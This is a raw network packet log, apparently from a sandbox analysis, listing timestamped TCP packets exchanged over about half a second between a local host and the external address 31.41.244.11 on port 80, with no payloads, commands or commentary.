Dec 17, 2024 06:03:42.583636045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.583686113 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.583730936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.583782911 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.584634066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.584681034 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.721576929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.721618891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.721688032 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.721730947 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.721782923 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.721847057 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.721896887 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.722795010 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.722847939 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.722898006 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.723887920 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.723941088 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.723987103 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.724045992 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.725003004 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.725037098 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.725052118 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.725081921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.726062059 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.726097107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.726146936 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.727180004 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.727215052 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.727231979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.727260113 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.728105068 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.728152990 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.728193045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.728236914 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.729171991 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.729213953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.729260921 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.729307890 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.730233908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.730303049 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.730340958 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.730411053 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.731360912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.731395960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.731416941 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.731446028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.731446028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.732408047 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.732441902 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.732495070 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.733359098 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.733408928 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.733483076 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.733532906 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.734601974 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.734636068 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.734684944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.735486031 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.735541105 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.735618114 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.735665083 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.736618042 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.736671925 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.736716986 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.737704992 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.737755060 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.737833977 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.737881899 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.738689899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.738801956 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.738848925 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.739706993 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.739754915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.739876986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.739922047 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.740969896 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.741003990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.741018057 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.741046906 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.742101908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.742136955 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.742188931 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.742913008 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.742959023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.743171930 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.743221045 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.743999004 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.744049072 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.744101048 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.744153023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.745079041 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.745131969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.745251894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.745301008 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.746093988 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.746140957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.746260881 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.746304989 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.747348070 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.747400045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.747405052 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.747443914 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.748328924 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.748384953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.748398066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.748437881 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.749330044 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.749381065 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.749526978 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.749577045 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.750353098 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.750401974 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.750405073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.750442982 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.751405954 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.751533985 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.751591921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.752456903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.752543926 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.752607107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.752651930 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.753650904 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.753684998 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.753693104 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.753725052 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.754571915 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.754786968 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.754832983 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.755600929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.755645037 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.756002903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.756047964 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.756752014 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.756803036 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.756804943 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.756845951 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.757858038 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.757890940 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.757901907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.757941008 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.758846998 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.758902073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.758945942 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.759922981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.759975910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.760051012 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.760088921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.760982990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.761030912 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.761082888 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.761126041 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.762098074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.762201071 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.762254000 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.763140917 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.763175011 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.763220072 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.764147997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.764199972 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.764257908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.764302015 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.765316010 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.765348911 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.765366077 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.765398979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.766242981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.766289949 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.766362906 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.766407013 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.767339945 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.767390966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.767440081 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.768671036 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.768704891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.768719912 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.768747091 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.769419909 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.769469023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.769494057 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.769536972 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.770452976 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.770613909 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.770663023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.771641970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.771675110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.771692038 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.771723986 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.772614002 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.772661924 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.772708893 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.772753954 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.773749113 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.773785114 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.773796082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.773823977 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.774779081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.774890900 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.774940014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.775849104 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.775882006 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.775893927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.775924921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.776880980 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.776923895 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.913897991 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.913935900 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.914043903 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.914124966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.914160013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.914228916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.914959908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.915007114 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.915086031 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.915141106 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.916130066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.916145086 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.916174889 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.916198969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.917292118 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.917308092 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.917356014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.918131113 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.918358088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.918401003 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.919244051 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.919300079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.919395924 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.919442892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.920382023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.920396090 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.920428038 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.920444012 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.921314001 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.921439886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.921489954 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.922354937 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.922424078 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.922475100 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.923434973 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.923479080 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.923553944 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.923602104 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.924510002 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.924556971 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.924591064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.924633026 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.925645113 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.925659895 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.925688028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.925702095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.926637888 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.926796913 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.926846027 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.927771091 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.927786112 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.927818060 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.927848101 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.928834915 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.928849936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.928899050 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.929830074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.929877996 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.930155039 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.930953026 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.930968046 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.930999041 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.931025982 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.932097912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.932113886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.932163000 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.932960987 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.933005095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.933299065 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.933345079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.934091091 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.934173107 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.934251070 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.934297085 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.935153961 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.935198069 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.935237885 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.935282946 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.936162949 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.936207056 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.936239958 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.936283112 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.937227964 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.937274933 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.937309027 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.937354088 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.938354969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.938369989 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.938415051 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.939337015 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.939382076 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.939421892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.939467907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.940393925 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.940439939 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.940476894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.940521002 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.941462994 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.941512108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.941606045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.941649914 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.942611933 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.942626953 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.942676067 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.943548918 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.943597078 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.943763018 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.943814039 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.944720030 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.944736004 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.944765091 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.944783926 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.945756912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.945815086 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.945864916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.946831942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.946847916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.946894884 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.947856903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.947882891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.947897911 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.947930098 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.948910952 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.948952913 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.949105978 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.949145079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.950016022 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.950063944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.950088024 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.950951099 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.951003075 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.951081038 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.951126099 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:42.952102900 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:42.952147961 CET	49902	80	192.168.2.5	31.41.244.11
